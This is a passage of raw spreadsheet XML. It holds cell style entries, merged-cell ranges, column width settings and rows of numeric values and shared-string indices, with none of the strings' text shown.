      <c r="M787" s="24"/>
      <c r="N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3"/>
      <c r="M788" s="24"/>
      <c r="N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3"/>
      <c r="M789" s="24"/>
      <c r="N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3"/>
      <c r="M790" s="24"/>
      <c r="N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3"/>
      <c r="M791" s="24"/>
      <c r="N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3"/>
      <c r="M792" s="24"/>
      <c r="N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3"/>
      <c r="M793" s="24"/>
      <c r="N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3"/>
      <c r="M794" s="24"/>
      <c r="N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3"/>
      <c r="M795" s="24"/>
      <c r="N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3"/>
      <c r="M796" s="24"/>
      <c r="N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3"/>
      <c r="M797" s="24"/>
      <c r="N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3"/>
      <c r="M798" s="24"/>
      <c r="N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3"/>
      <c r="M799" s="24"/>
      <c r="N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3"/>
      <c r="M800" s="24"/>
      <c r="N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3"/>
      <c r="M801" s="24"/>
      <c r="N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3"/>
      <c r="M802" s="24"/>
      <c r="N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3"/>
      <c r="M803" s="24"/>
      <c r="N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3"/>
      <c r="M804" s="24"/>
      <c r="N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3"/>
      <c r="M805" s="24"/>
      <c r="N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3"/>
      <c r="M806" s="24"/>
      <c r="N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3"/>
      <c r="M807" s="24"/>
      <c r="N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3"/>
      <c r="M808" s="24"/>
      <c r="N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3"/>
      <c r="M809" s="24"/>
      <c r="N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3"/>
      <c r="M810" s="24"/>
      <c r="N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3"/>
      <c r="M811" s="24"/>
      <c r="N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3"/>
      <c r="M812" s="24"/>
      <c r="N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3"/>
      <c r="M813" s="24"/>
      <c r="N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3"/>
      <c r="M814" s="24"/>
      <c r="N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3"/>
      <c r="M815" s="24"/>
      <c r="N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3"/>
      <c r="M816" s="24"/>
      <c r="N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3"/>
      <c r="M817" s="24"/>
      <c r="N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3"/>
      <c r="M818" s="24"/>
      <c r="N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3"/>
      <c r="M819" s="24"/>
      <c r="N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3"/>
      <c r="M820" s="24"/>
      <c r="N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3"/>
      <c r="M821" s="24"/>
      <c r="N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3"/>
      <c r="M822" s="24"/>
      <c r="N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3"/>
      <c r="M823" s="24"/>
      <c r="N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3"/>
      <c r="M824" s="24"/>
      <c r="N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3"/>
      <c r="M825" s="24"/>
      <c r="N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3"/>
      <c r="M826" s="24"/>
      <c r="N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3"/>
      <c r="M827" s="24"/>
      <c r="N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3"/>
      <c r="M828" s="24"/>
      <c r="N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3"/>
      <c r="M829" s="24"/>
      <c r="N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3"/>
      <c r="M830" s="24"/>
      <c r="N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3"/>
      <c r="M831" s="24"/>
      <c r="N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3"/>
      <c r="M832" s="24"/>
      <c r="N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3"/>
      <c r="M833" s="24"/>
      <c r="N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3"/>
      <c r="M834" s="24"/>
      <c r="N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3"/>
      <c r="M835" s="24"/>
      <c r="N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3"/>
      <c r="M836" s="24"/>
      <c r="N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3"/>
      <c r="M837" s="24"/>
      <c r="N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3"/>
      <c r="M838" s="24"/>
      <c r="N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3"/>
      <c r="M839" s="24"/>
      <c r="N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3"/>
      <c r="M840" s="24"/>
      <c r="N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3"/>
      <c r="M841" s="24"/>
      <c r="N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3"/>
      <c r="M842" s="24"/>
      <c r="N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3"/>
      <c r="M843" s="24"/>
      <c r="N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3"/>
      <c r="M844" s="24"/>
      <c r="N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3"/>
      <c r="M845" s="24"/>
      <c r="N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3"/>
      <c r="M846" s="24"/>
      <c r="N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3"/>
      <c r="M847" s="24"/>
      <c r="N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3"/>
      <c r="M848" s="24"/>
      <c r="N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3"/>
      <c r="M849" s="24"/>
      <c r="N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3"/>
      <c r="M850" s="24"/>
      <c r="N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3"/>
      <c r="M851" s="24"/>
      <c r="N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3"/>
      <c r="M852" s="24"/>
      <c r="N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3"/>
      <c r="M853" s="24"/>
      <c r="N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3"/>
      <c r="M854" s="24"/>
      <c r="N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3"/>
      <c r="M855" s="24"/>
      <c r="N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3"/>
      <c r="M856" s="24"/>
      <c r="N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3"/>
      <c r="M857" s="24"/>
      <c r="N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3"/>
      <c r="M858" s="24"/>
      <c r="N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3"/>
      <c r="M859" s="24"/>
      <c r="N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3"/>
      <c r="M860" s="24"/>
      <c r="N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3"/>
      <c r="M861" s="24"/>
      <c r="N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3"/>
      <c r="M862" s="24"/>
      <c r="N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3"/>
      <c r="M863" s="24"/>
      <c r="N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3"/>
      <c r="M864" s="24"/>
      <c r="N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3"/>
      <c r="M865" s="24"/>
      <c r="N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3"/>
      <c r="M866" s="24"/>
      <c r="N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3"/>
      <c r="M867" s="24"/>
      <c r="N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3"/>
      <c r="M868" s="24"/>
      <c r="N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3"/>
      <c r="M869" s="24"/>
      <c r="N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3"/>
      <c r="M870" s="24"/>
      <c r="N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3"/>
      <c r="M871" s="24"/>
      <c r="N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3"/>
      <c r="M872" s="24"/>
      <c r="N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3"/>
      <c r="M873" s="24"/>
      <c r="N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3"/>
      <c r="M874" s="24"/>
      <c r="N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3"/>
      <c r="M875" s="24"/>
      <c r="N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3"/>
      <c r="M876" s="24"/>
      <c r="N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3"/>
      <c r="M877" s="24"/>
      <c r="N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3"/>
      <c r="M878" s="24"/>
      <c r="N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3"/>
      <c r="M879" s="24"/>
      <c r="N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3"/>
      <c r="M880" s="24"/>
      <c r="N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3"/>
      <c r="M881" s="24"/>
      <c r="N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3"/>
      <c r="M882" s="24"/>
      <c r="N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3"/>
      <c r="M883" s="24"/>
      <c r="N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3"/>
      <c r="M884" s="24"/>
      <c r="N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3"/>
      <c r="M885" s="24"/>
      <c r="N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3"/>
      <c r="M886" s="24"/>
      <c r="N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3"/>
      <c r="M887" s="24"/>
      <c r="N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3"/>
      <c r="M888" s="24"/>
      <c r="N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3"/>
      <c r="M889" s="24"/>
      <c r="N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3"/>
      <c r="M890" s="24"/>
      <c r="N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3"/>
      <c r="M891" s="24"/>
      <c r="N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3"/>
      <c r="M892" s="24"/>
      <c r="N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3"/>
      <c r="M893" s="24"/>
      <c r="N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3"/>
      <c r="M894" s="24"/>
      <c r="N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3"/>
      <c r="M895" s="24"/>
      <c r="N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3"/>
      <c r="M896" s="24"/>
      <c r="N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3"/>
      <c r="M897" s="24"/>
      <c r="N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3"/>
      <c r="M898" s="24"/>
      <c r="N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3"/>
      <c r="M899" s="24"/>
      <c r="N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3"/>
      <c r="M900" s="24"/>
      <c r="N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3"/>
      <c r="M901" s="24"/>
      <c r="N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3"/>
      <c r="M902" s="24"/>
      <c r="N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3"/>
      <c r="M903" s="24"/>
      <c r="N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3"/>
      <c r="M904" s="24"/>
      <c r="N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3"/>
      <c r="M905" s="24"/>
      <c r="N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3"/>
      <c r="M906" s="24"/>
      <c r="N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3"/>
      <c r="M907" s="24"/>
      <c r="N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3"/>
      <c r="M908" s="24"/>
      <c r="N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3"/>
      <c r="M909" s="24"/>
      <c r="N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3"/>
      <c r="M910" s="24"/>
      <c r="N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3"/>
      <c r="M911" s="24"/>
      <c r="N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3"/>
      <c r="M912" s="24"/>
      <c r="N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3"/>
      <c r="M913" s="24"/>
      <c r="N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3"/>
      <c r="M914" s="24"/>
      <c r="N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3"/>
      <c r="M915" s="24"/>
      <c r="N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3"/>
      <c r="M916" s="24"/>
      <c r="N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3"/>
      <c r="M917" s="24"/>
      <c r="N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3"/>
      <c r="M918" s="24"/>
      <c r="N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3"/>
      <c r="M919" s="24"/>
      <c r="N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3"/>
      <c r="M920" s="24"/>
      <c r="N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3"/>
      <c r="M921" s="24"/>
      <c r="N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3"/>
      <c r="M922" s="24"/>
      <c r="N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3"/>
      <c r="M923" s="24"/>
      <c r="N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3"/>
      <c r="M924" s="24"/>
      <c r="N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3"/>
      <c r="M925" s="24"/>
      <c r="N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3"/>
      <c r="M926" s="24"/>
      <c r="N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3"/>
      <c r="M927" s="24"/>
      <c r="N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3"/>
      <c r="M928" s="24"/>
      <c r="N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3"/>
      <c r="M929" s="24"/>
      <c r="N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3"/>
      <c r="M930" s="24"/>
      <c r="N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3"/>
      <c r="M931" s="24"/>
      <c r="N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3"/>
      <c r="M932" s="24"/>
      <c r="N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3"/>
      <c r="M933" s="24"/>
      <c r="N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3"/>
      <c r="M934" s="24"/>
      <c r="N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3"/>
      <c r="M935" s="24"/>
      <c r="N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3"/>
      <c r="M936" s="24"/>
      <c r="N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3"/>
      <c r="M937" s="24"/>
      <c r="N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3"/>
      <c r="M938" s="24"/>
      <c r="N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3"/>
      <c r="M939" s="24"/>
      <c r="N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3"/>
      <c r="M940" s="24"/>
      <c r="N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3"/>
      <c r="M941" s="24"/>
      <c r="N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3"/>
      <c r="M942" s="24"/>
      <c r="N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3"/>
      <c r="M943" s="24"/>
      <c r="N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3"/>
      <c r="M944" s="24"/>
      <c r="N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3"/>
      <c r="M945" s="24"/>
      <c r="N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3"/>
      <c r="M946" s="24"/>
      <c r="N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3"/>
      <c r="M947" s="24"/>
      <c r="N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3"/>
      <c r="M948" s="24"/>
      <c r="N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3"/>
      <c r="M949" s="24"/>
      <c r="N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3"/>
      <c r="M950" s="24"/>
      <c r="N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3"/>
      <c r="M951" s="24"/>
      <c r="N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3"/>
      <c r="M952" s="24"/>
      <c r="N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3"/>
      <c r="M953" s="24"/>
      <c r="N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3"/>
      <c r="M954" s="24"/>
      <c r="N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3"/>
      <c r="M955" s="24"/>
      <c r="N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3"/>
      <c r="M956" s="24"/>
      <c r="N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3"/>
      <c r="M957" s="24"/>
      <c r="N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3"/>
      <c r="M958" s="24"/>
      <c r="N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3"/>
      <c r="M959" s="24"/>
      <c r="N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3"/>
      <c r="M960" s="24"/>
      <c r="N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3"/>
      <c r="M961" s="24"/>
      <c r="N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3"/>
      <c r="M962" s="24"/>
      <c r="N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3"/>
      <c r="M963" s="24"/>
      <c r="N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3"/>
      <c r="M964" s="24"/>
      <c r="N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3"/>
      <c r="M965" s="24"/>
      <c r="N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3"/>
      <c r="M966" s="24"/>
      <c r="N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3"/>
      <c r="M967" s="24"/>
      <c r="N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3"/>
      <c r="M968" s="24"/>
      <c r="N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3"/>
      <c r="M969" s="24"/>
      <c r="N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3"/>
      <c r="M970" s="24"/>
      <c r="N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3"/>
      <c r="M971" s="24"/>
      <c r="N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3"/>
      <c r="M972" s="24"/>
      <c r="N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3"/>
      <c r="M973" s="24"/>
      <c r="N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3"/>
      <c r="M974" s="24"/>
      <c r="N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3"/>
      <c r="M975" s="24"/>
      <c r="N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3"/>
      <c r="M976" s="24"/>
      <c r="N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3"/>
      <c r="M977" s="24"/>
      <c r="N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3"/>
      <c r="M978" s="24"/>
      <c r="N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3"/>
      <c r="M979" s="24"/>
      <c r="N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3"/>
      <c r="M980" s="24"/>
      <c r="N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3"/>
      <c r="M981" s="24"/>
      <c r="N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3"/>
      <c r="M982" s="24"/>
      <c r="N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3"/>
      <c r="M983" s="24"/>
      <c r="N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3"/>
      <c r="M984" s="24"/>
      <c r="N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3"/>
      <c r="M985" s="24"/>
      <c r="N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3"/>
      <c r="M986" s="24"/>
      <c r="N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3"/>
      <c r="M987" s="24"/>
      <c r="N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3"/>
      <c r="M988" s="24"/>
      <c r="N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3"/>
      <c r="M989" s="24"/>
      <c r="N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3"/>
      <c r="M990" s="24"/>
      <c r="N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3"/>
      <c r="M991" s="24"/>
      <c r="N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3"/>
      <c r="M992" s="24"/>
      <c r="N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3"/>
      <c r="M993" s="24"/>
      <c r="N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3"/>
      <c r="M994" s="24"/>
      <c r="N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3"/>
      <c r="M995" s="24"/>
      <c r="N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3"/>
      <c r="M996" s="24"/>
      <c r="N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3"/>
      <c r="M997" s="24"/>
      <c r="N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3"/>
      <c r="M998" s="24"/>
      <c r="N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3"/>
      <c r="M999" s="24"/>
      <c r="N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3"/>
      <c r="M1000" s="24"/>
      <c r="N1000" s="22"/>
    </row>
  </sheetData>
  <mergeCells count="21">
    <mergeCell ref="C8:C10"/>
    <mergeCell ref="D8:D10"/>
    <mergeCell ref="B2:B4"/>
    <mergeCell ref="C2:C4"/>
    <mergeCell ref="D2:D4"/>
    <mergeCell ref="B5:B7"/>
    <mergeCell ref="C5:C7"/>
    <mergeCell ref="D5:D7"/>
    <mergeCell ref="B8:B10"/>
    <mergeCell ref="C17:C19"/>
    <mergeCell ref="D17:D19"/>
    <mergeCell ref="B20:B22"/>
    <mergeCell ref="C20:C22"/>
    <mergeCell ref="D20:D22"/>
    <mergeCell ref="B11:B13"/>
    <mergeCell ref="C11:C13"/>
    <mergeCell ref="D11:D13"/>
    <mergeCell ref="B14:B16"/>
    <mergeCell ref="C14:C16"/>
    <mergeCell ref="D14:D16"/>
    <mergeCell ref="B17:B1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25"/>
    <col customWidth="1" hidden="1" min="2" max="2" width="7.25"/>
    <col customWidth="1" min="3" max="3" width="6.75"/>
    <col customWidth="1" min="4" max="4" width="16.0"/>
    <col customWidth="1" min="5" max="5" width="10.0"/>
    <col customWidth="1" min="6" max="7" width="23.13"/>
    <col customWidth="1" hidden="1" min="12" max="12" width="36.88"/>
    <col customWidth="1" min="13" max="13" width="84.88"/>
    <col customWidth="1" min="14" max="14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3">
        <v>1.0</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>15</v>
      </c>
      <c r="E2" s="2">
        <v>1.0</v>
      </c>
      <c r="F2" s="4" t="s">
        <v>16</v>
      </c>
      <c r="G2" s="4" t="s">
        <v>17</v>
      </c>
      <c r="H2" s="2">
        <v>1.0</v>
      </c>
      <c r="I2" s="2">
        <v>0.0</v>
      </c>
      <c r="J2" s="2">
        <v>0.0</v>
      </c>
      <c r="K2" s="2">
        <v>0.0</v>
      </c>
      <c r="L2" s="2"/>
      <c r="M2" s="2" t="s">
        <v>18</v>
      </c>
      <c r="N2" s="2"/>
    </row>
    <row r="3">
      <c r="A3" s="2">
        <v>2.0</v>
      </c>
      <c r="E3" s="2">
        <v>2.0</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>19</v>
      </c>
      <c r="G3" s="4" t="s">
        <v>20</v>
      </c>
      <c r="H3" s="2">
        <v>1.0</v>
      </c>
      <c r="I3" s="2">
        <v>0.0</v>
      </c>
      <c r="J3" s="2">
        <v>1.0</v>
      </c>
      <c r="K3" s="2">
        <v>0.0</v>
      </c>
      <c r="L3" s="5"/>
      <c r="M3" s="2" t="s">
        <v>21</v>
      </c>
      <c r="N3" s="5" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2">
        <v>3.0</v>
      </c>
      <c r="E4" s="2">
        <v>3.0</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>23</v>
      </c>
      <c r="G4" s="4" t="s">
        <v>24</v>
      </c>
      <c r="H4" s="2">
        <v>1.0</v>
      </c>
      <c r="I4" s="2">
        <v>0.0</v>
      </c>
      <c r="J4" s="2">
        <v>0.0</v>
      </c>
      <c r="K4" s="2">
        <v>0.0</v>
      </c>
      <c r="L4" s="2"/>
      <c r="M4" s="2" t="s">
        <v>25</v>
      </c>
      <c r="N4" s="2"/>
    </row>
    <row r="5">
      <c r="A5" s="2">
        <v>4.0</v>
      </c>
      <c r="B5" s="3">
        <v>1.0</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E5" s="2">
        <v>1.0</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>27</v>
      </c>
      <c r="G5" s="4" t="s">
        <v>28</v>
      </c>
      <c r="H5" s="2">
        <v>1.0</v>
      </c>
      <c r="I5" s="2">
        <v>0.0</v>
      </c>
      <c r="J5" s="2">
        <v>0.0</v>
      </c>
      <c r="K5" s="2">
        <v>0.0</v>
      </c>
      <c r="L5" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M5" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N5" s="2"/>
    </row>
    <row r="6">
      <c r="A6" s="2">
        <v>5.0</v>
      </c>
      <c r="E6" s="2">
        <v>2.0</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>31</v>
      </c>
      <c r="G6" s="4" t="s">
        <v>32</v>
      </c>
      <c r="H6" s="2">
        <v>1.0</v>
      </c>
      <c r="I6" s="2">
        <v>0.0</v>
      </c>
      <c r="J6" s="2">
        <v>0.0</v>
      </c>
      <c r="K6" s="2">
        <v>0.0</v>
      </c>
      <c r="L6" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M6" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N6" s="2"/>
    </row>
    <row r="7">
      <c r="A7" s="2">
        <v>6.0</v>
      </c>
      <c r="E7" s="2">
        <v>3.0</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>33</v>
      </c>
      <c r="G7" s="4" t="s">
        <v>34</v>
      </c>
      <c r="H7" s="2">
        <v>1.0</v>
      </c>
      <c r="I7" s="2">
        <v>0.0</v>
      </c>
      <c r="J7" s="2">
        <v>0.0</v>
      </c>
      <c r="K7" s="2">
        <v>0.0</v>
      </c>
      <c r="L7" s="5" t="s">
        <v>29</v>
      </c>
      <c r="M7" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N7" s="2"/>
    </row>
    <row r="8">
      <c r="A8" s="2">
        <v>7.0</v>
      </c>
      <c r="B8" s="3">
        <v>1.0</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="E8" s="2">
        <v>1.0</v>
      </c>
      <c r="F8" s="6" t="s">
        <v>36</v>
      </c>
      <c r="G8" s="6" t="s">
        <v>37</v>
      </c>
      <c r="H8" s="2">
        <v>1.0</v>
      </c>
      <c r="I8" s="2">
        <v>0.0</v>
      </c>
      <c r="J8" s="2">
        <v>0.0</v>
      </c>
      <c r="K8" s="2">
        <v>0.0</v>
      </c>
      <c r="L8" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M8" s="2" t="s">
        <v>38</v>
      </c>
      <c r="N8" s="2"/>
    </row>
    <row r="9">
      <c r="A9" s="2">
        <v>8.0</v>
      </c>
      <c r="E9" s="2">
        <v>2.0</v>
      </c>
      <c r="F9" s="6" t="s">
        <v>39</v>
      </c>
      <c r="G9" s="6" t="s">
        <v>40</v>
      </c>
      <c r="H9" s="2">
        <v>1.0</v>
      </c>
      <c r="I9" s="2">
        <v>0.0</v>
      </c>
      <c r="J9" s="2">
        <v>0.0</v>
      </c>
      <c r="K9" s="2">
        <v>0.0</v>
      </c>
      <c r="L9" s="5" t="s">
        <v>29</v>
      </c>
      <c r="M9" s="2" t="s">
        <v>41</v>
      </c>
      <c r="N9" s="2"/>
    </row>
    <row r="10">
      <c r="A10" s="2">
        <v>9.0</v>
      </c>
      <c r="E10" s="2">
        <v>3.0</v>
      </c>
      <c r="F10" s="6" t="s">
        <v>42</v>
      </c>
      <c r="G10" s="6" t="s">
        <v>43</v>
      </c>
      <c r="H10" s="2">
        <v>1.0</v>
      </c>
      <c r="I10" s="2">
        <v>0.0</v>
      </c>
      <c r="J10" s="2">
        <v>0.0</v>
      </c>
      <c r="K10" s="2">
        <v>0.0</v>
      </c>
      <c r="L10" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M10" s="2" t="s">
        <v>41</v>
      </c>
      <c r="N10" s="2"/>
    </row>
    <row r="11">
      <c r="A11" s="2">
        <v>10.0</v>
      </c>
      <c r="B11" s="3">
        <v>1.0</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D11" s="3" t="s">
        <v>44</v>
      </c>
      <c r="E11" s="2">
        <v>1.0</v>
      </c>
      <c r="F11" s="6" t="s">
        <v>45</v>
      </c>
      <c r="G11" s="6" t="s">
        <v>46</v>
      </c>
      <c r="H11" s="2">
        <v>1.0</v>
      </c>
      <c r="I11" s="2">
        <v>0.0</v>
      </c>
      <c r="J11" s="2">
        <v>0.0</v>
      </c>
      <c r="K11" s="2">
        <v>0.0</v>
      </c>
      <c r="L11" s="2" t="s">
        <v>47</v>
      </c>
      <c r="M11" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N11" s="2"/>
    </row>
    <row r="12">
      <c r="A12" s="2">
        <v>11.0</v>
      </c>
      <c r="E12" s="2">
        <v>2.0</v>
      </c>
      <c r="F12" s="6" t="s">
        <v>49</v>
      </c>
      <c r="G12" s="6" t="s">
        <v>50</v>
      </c>
      <c r="H12" s="2">
        <v>1.0</v>
      </c>
      <c r="I12" s="2">
        <v>0.0</v>
      </c>
      <c r="J12" s="2">
        <v>0.0</v>
      </c>
      <c r="K12" s="2">
        <v>0.0</v>
      </c>
      <c r="L12" s="2" t="s">
        <v>51</v>
      </c>
      <c r="M12" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N12" s="2"/>
    </row>
    <row r="13">
      <c r="A13" s="2">
        <v>12.0</v>
      </c>
      <c r="E13" s="2">
        <v>3.0</v>
      </c>
      <c r="F13" s="6" t="s">
        <v>52</v>
      </c>
      <c r="G13" s="6" t="s">
        <v>53</v>
      </c>
      <c r="H13" s="2">
        <v>1.0</v>
      </c>
      <c r="I13" s="2">
        <v>0.0</v>
      </c>
      <c r="J13" s="2">
        <v>0.0</v>
      </c>
      <c r="K13" s="2">
        <v>0.0</v>
      </c>
      <c r="L13" s="2" t="s">
        <v>51</v>
      </c>
      <c r="M13" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N13" s="2"/>
    </row>
    <row r="14">
      <c r="A14" s="2">
        <v>13.0</v>
      </c>
      <c r="B14" s="3">
        <v>1.0</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D14" s="3" t="s">
        <v>54</v>
      </c>
      <c r="E14" s="2">
        <v>1.0</v>
      </c>
      <c r="F14" s="6" t="s">
        <v>55</v>
      </c>
      <c r="G14" s="6" t="s">
        <v>56</v>
      </c>
      <c r="H14" s="2">
        <v>1.0</v>
      </c>
      <c r="I14" s="2">
        <v>0.0</v>
      </c>
      <c r="J14" s="2">
        <v>0.0</v>
      </c>
      <c r="K14" s="2">
        <v>0.0</v>
      </c>
      <c r="L14" s="2" t="s">
        <v>57</v>
      </c>
      <c r="M14" s="2" t="s">
        <v>58</v>
      </c>
      <c r="N14" s="2"/>
    </row>
    <row r="15">
      <c r="A15" s="2">
        <v>14.0</v>
      </c>
      <c r="E15" s="2">
        <v>2.0</v>
      </c>
      <c r="F15" s="6" t="s">
        <v>59</v>
      </c>
      <c r="G15" s="6" t="s">
        <v>60</v>
      </c>
      <c r="H15" s="2">
        <v>1.0</v>
      </c>
      <c r="I15" s="2">
        <v>0.0</v>
      </c>
      <c r="J15" s="2">
        <v>0.0</v>
      </c>
      <c r="K15" s="2">
        <v>0.0</v>
      </c>
      <c r="L15" s="7" t="s">
        <v>61</v>
      </c>
      <c r="M15" s="2" t="s">
        <v>62</v>
      </c>
      <c r="N15" s="2"/>
    </row>
    <row r="16">
      <c r="A16" s="2">
        <v>15.0</v>
      </c>
      <c r="E16" s="2">
        <v>3.0</v>
      </c>
      <c r="F16" s="6" t="s">
        <v>63</v>
      </c>
      <c r="G16" s="6" t="s">
        <v>64</v>
      </c>
      <c r="H16" s="2">
        <v>1.0</v>
      </c>
      <c r="I16" s="2">
        <v>0.0</v>
      </c>
      <c r="J16" s="2">
        <v>0.0</v>
      </c>
      <c r="K16" s="2">
        <v>0.0</v>
      </c>
      <c r="L16" s="2" t="s">
        <v>65</v>
      </c>
      <c r="M16" s="2" t="s">
        <v>66</v>
      </c>
      <c r="N16" s="2"/>
    </row>
    <row r="17">
      <c r="A17" s="2">
        <v>16.0</v>
      </c>
      <c r="B17" s="3">
        <v>1.0</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D17" s="3" t="s">
        <v>67</v>
      </c>
      <c r="E17" s="2">
        <v>1.0</v>
      </c>
      <c r="F17" s="6" t="s">
        <v>68</v>
      </c>
      <c r="G17" s="6" t="s">
        <v>69</v>
      </c>
      <c r="H17" s="2">
        <v>1.0</v>
      </c>
      <c r="I17" s="2">
        <v>0.0</v>
      </c>
      <c r="J17" s="2">
        <v>0.0</v>
      </c>
      <c r="K17" s="2">
        <v>0.0</v>
      </c>
      <c r="L17" s="2" t="s">
        <v>70</v>
      </c>
      <c r="M17" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N17" s="2"/>
    </row>
    <row r="18">
      <c r="A18" s="2">
        <v>17.0</v>
      </c>
      <c r="E18" s="2">
        <v>2.0</v>
      </c>
      <c r="F18" s="6" t="s">
        <v>72</v>
      </c>
      <c r="G18" s="6" t="s">
        <v>73</v>
      </c>
      <c r="H18" s="2">
        <v>1.0</v>
      </c>
      <c r="I18" s="2">
        <v>0.0</v>
      </c>
      <c r="J18" s="2">
        <v>0.0</v>
      </c>
      <c r="K18" s="2">
        <v>0.0</v>
      </c>
      <c r="L18" s="2" t="s">
        <v>74</v>
      </c>
      <c r="M18" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N18" s="2"/>
    </row>
    <row r="19">
      <c r="A19" s="2">
        <v>18.0</v>
      </c>
      <c r="E19" s="2">
        <v>3.0</v>
      </c>
      <c r="F19" s="6" t="s">
        <v>75</v>
      </c>
      <c r="G19" s="6" t="s">
        <v>76</v>
      </c>
      <c r="H19" s="2">
        <v>1.0</v>
      </c>
      <c r="I19" s="2">
        <v>0.0</v>
      </c>
      <c r="J19" s="2">
        <v>0.0</v>
      </c>
      <c r="K19" s="2">
        <v>0.0</v>
      </c>
      <c r="L19" s="7" t="s">
        <v>77</v>
      </c>
      <c r="M19" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N19" s="2"/>
    </row>
    <row r="20">
      <c r="A20" s="8">
        <v>19.0</v>
      </c>
      <c r="B20" s="9">
        <v>1.0</v>
      </c>
      <c r="C20" s="10" t="s">
        <v>14</v>
      </c>
      <c r="D20" s="11" t="s">
        <v>78</v>
      </c>
      <c r="E20" s="10">
        <v>1.0</v>
      </c>
      <c r="F20" s="12" t="s">
        <v>79</v>
      </c>
      <c r="G20" s="12" t="s">
        <v>80</v>
      </c>
      <c r="H20" s="2">
        <v>1.0</v>
      </c>
      <c r="I20" s="2">
        <v>0.0</v>
      </c>
      <c r="J20" s="2">
        <v>0.0</v>
      </c>
      <c r="K20" s="2">
        <v>0.0</v>
      </c>
      <c r="L20" s="13"/>
      <c r="M20" s="14" t="s">
        <v>81</v>
      </c>
      <c r="N20" s="15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</row>
    <row r="21">
      <c r="A21" s="8">
        <v>20.0</v>
      </c>
      <c r="E21" s="10">
        <v>2.0</v>
      </c>
      <c r="F21" s="12" t="s">
        <v>82</v>
      </c>
      <c r="G21" s="12" t="s">
        <v>83</v>
      </c>
      <c r="H21" s="2">
        <v>1.0</v>
      </c>
      <c r="I21" s="2">
        <v>0.0</v>
      </c>
      <c r="J21" s="2">
        <v>0.0</v>
      </c>
      <c r="K21" s="2">
        <v>0.0</v>
      </c>
      <c r="L21" s="13"/>
      <c r="M21" s="14" t="s">
        <v>84</v>
      </c>
      <c r="N21" s="15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</row>
    <row r="22">
      <c r="A22" s="8">
        <v>21.0</v>
      </c>
      <c r="E22" s="10">
        <v>3.0</v>
      </c>
      <c r="F22" s="12" t="s">
        <v>85</v>
      </c>
      <c r="G22" s="12" t="s">
        <v>86</v>
      </c>
      <c r="H22" s="2">
        <v>1.0</v>
      </c>
      <c r="I22" s="2">
        <v>0.0</v>
      </c>
      <c r="J22" s="2">
        <v>0.0</v>
      </c>
      <c r="K22" s="2">
        <v>0.0</v>
      </c>
      <c r="L22" s="13"/>
      <c r="M22" s="14" t="s">
        <v>111</v>
      </c>
      <c r="N22" s="13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</row>
    <row r="23">
      <c r="A23" s="17">
        <v>22.0</v>
      </c>
      <c r="B23" s="17">
        <v>1.0</v>
      </c>
      <c r="C23" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D23" s="18" t="s">
        <v>89</v>
      </c>
      <c r="E23" s="17">
        <v>1.0</v>
      </c>
      <c r="F23" s="17" t="s">
        <v>90</v>
      </c>
      <c r="G23" s="17" t="s">
        <v>91</v>
      </c>
      <c r="H23" s="2">
        <v>0.0</v>
      </c>
      <c r="I23" s="2">
        <v>0.0</v>
      </c>
      <c r="J23" s="2">
        <v>0.0</v>
      </c>
      <c r="K23" s="2">
        <v>2.0</v>
      </c>
      <c r="L23" s="19"/>
      <c r="M23" s="20" t="s">
        <v>92</v>
      </c>
      <c r="N23" s="21"/>
    </row>
    <row r="24">
      <c r="A24" s="17">
        <v>23.0</v>
      </c>
      <c r="B24" s="17">
        <v>1.0</v>
      </c>
      <c r="C24" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D24" s="18" t="s">
        <v>89</v>
      </c>
      <c r="E24" s="17">
        <v>2.0</v>
      </c>
      <c r="F24" s="17" t="s">
        <v>93</v>
      </c>
      <c r="G24" s="17" t="s">
        <v>94</v>
      </c>
      <c r="H24" s="2">
        <v>0.0</v>
      </c>
      <c r="I24" s="2">
        <v>0.0</v>
      </c>
      <c r="J24" s="2">
        <v>0.0</v>
      </c>
      <c r="K24" s="2">
        <v>2.0</v>
      </c>
      <c r="L24" s="19"/>
      <c r="M24" s="20" t="s">
        <v>95</v>
      </c>
      <c r="N24" s="21"/>
    </row>
    <row r="25">
      <c r="A25" s="17">
        <v>24.0</v>
      </c>
      <c r="B25" s="17">
        <v>1.0</v>
      </c>
      <c r="C25" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D25" s="18" t="s">
        <v>89</v>
      </c>
      <c r="E25" s="17">
        <v>3.0</v>
      </c>
      <c r="F25" s="17" t="s">
        <v>96</v>
      </c>
      <c r="G25" s="17" t="s">
        <v>97</v>
      </c>
      <c r="H25" s="2">
        <v>0.0</v>
      </c>
      <c r="I25" s="2">
        <v>0.0</v>
      </c>
      <c r="J25" s="2">
        <v>0.0</v>
      </c>
      <c r="K25" s="2">
        <v>2.0</v>
      </c>
      <c r="L25" s="19"/>
      <c r="M25" s="20" t="s">
        <v>98</v>
      </c>
      <c r="N25" s="21"/>
    </row>
    <row r="26">
      <c r="A26" s="17">
